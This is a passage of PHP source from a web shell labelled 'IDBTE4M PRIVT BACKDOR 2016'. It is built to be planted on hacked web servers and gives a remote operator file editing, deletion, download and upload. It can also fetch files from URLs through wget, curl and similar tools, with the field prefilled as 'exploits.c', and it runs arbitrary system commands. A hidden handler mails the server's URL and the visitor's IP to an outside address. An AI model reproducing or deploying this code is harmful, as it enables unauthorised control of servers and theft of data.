type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" /> </form> </td></tr> <tr><td>Size</td><td>".ukuran($file)."</td></tr> <tr><td>Permission</td><td>".get_perms($file)."</td></tr> <tr><td>Owner</td><td>".$owner."</td></tr> <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr> <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr> <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr> <tr><td>Actions</td><td><a href=\"?y=$pwd&edit=$file\">edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a> | <a href=\"?y=$pwd&delete=$file\">delete</a> | <a href=\"?y=$pwd&dl=$file\">download</a> (<a href=\"?y=$pwd&dlgzip=$file\">gzip</a>)</td></tr> <tr><td>View</td><td><a href=\"?y=".$pwd."&view=".$file."\">text</a> | <a href=\"?y=".$pwd."&view=".$file."&type=code\">code</a> | <a href=\"?y=".$pwd."&view=".$file."&type=image\">image</a></td></tr> </table> ";
3379 if(isset($_GET['type']) && ($_GET['type']=='image')){ echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&img=".$filn."\"></div>"; } elseif(isset($_GET['type']) && ($_GET['type']=='code')){ echo "<div class=\"viewfile\">"; $file = wordwrap(@file_get_contents($file),"240","\n"); @highlight_string($file); echo "</div>"; } else { echo "<div class=\"viewfile\">"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "</div>"; } } elseif(is_dir($_GET['view'])){ echo showdir($pwd,$prompt); } } elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){ if(isset($_POST['save'])){ $file = $_POST['saveas']; $content = magicboom($_POST['content']); if($filez = @fopen($file,"w")){ $time = date("d-M-Y H:i",time());
3380 if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time; else $msg = "failed to save"; @fclose($filez); } else $msg = "permission denied"; } if(!isset($file)) $file = $_GET['edit']; if($filez = @fopen($file,"r")){ $content = ""; while(!feof($filez)){ $content .= htmlentities(str_replace("''","'",fgets($filez))); } @fclose($filez); } ?>
3381 <form action="?y=<?php echo $pwd; ?>&edit=<?php echo $file; ?>" method="post">
3382 <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" name="content">
3383 <?php echo $content; ?> </textarea> <tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" />
3384 <input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> <?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){ if(isset($_POST['uploadcomp'])){ if(is_uploaded_file($_FILES['file']['tmp_name'])){ $path = magicboom($_POST['path']); $fname = $_FILES['file']['name']; $tmp_name = $_FILES['file']['tmp_name']; $pindah = $path.$fname; $stat = @move_uploaded_file($tmp_name,$pindah); if ($stat) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $fname"; } else $msg = "failed to upload $fname"; } elseif(isset($_POST['uploadurl'])){ $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']);
3385 $path = magicboom($_POST['path']); $namafile = download($pilihan,$wurl); $pindah = $path.$namafile; if(is_file($pindah)) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $namafile"; } ?>
3386 <form action="?y=<?php echo $pwd; ?>&x=upload" enctype="multipart/form-data" method="post">
3387 <table class="tabnet" style="width:320px;padding:0 1px;">
3388 <tr><th colspan="2">Upload from computer</th></tr> <tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> </tr> </table></form> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from url</th></tr>
3389 <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&x=upload">
3390 <table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
3391 <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td>
3392 <td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td> </tr> </table>
3393 <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
3394 <?php if(isset($_GET['idb']) && ($_GET['idb'] == '?')){ @ini_set('output_buffering', 0); @ini_set('display_errors', 0); set_time_limit(0); ini_set('memory_limit', '64M'); header('Content-Type: text/html; charset=UTF-8'); $tujuanmail = 'aghacker67@gmail.com'; $x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI']; $pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]"; mail($tujuanmail, "Maho", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]"); }?>
3395 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){ ?> <form action="?y=<?php echo $pwd; ?>&x=shell" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" readonly> <?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea>
3396 <tr><td colspan="2"><?php echo $prompt; ?> <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:6%;" /></td></tr> </table> </form> <?php } else { if(isset($_GET['delete']) && ($_GET['delete'] != "")){ $file = $_GET['delete']; @unlink($file); } elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){ @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR)); } elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){ $path = $pwd.$_GET['mkdir']; @mkdir($path); } $buff = showdir($pwd,$prompt); echo $buff; } ?>
3397 <p><center><div class="info">-=[ IDBTE4M PRIVT BACKDOR 2016 ]=- <span class="gaya"><a href="http://fb.com/idbte4m"></a></span></div>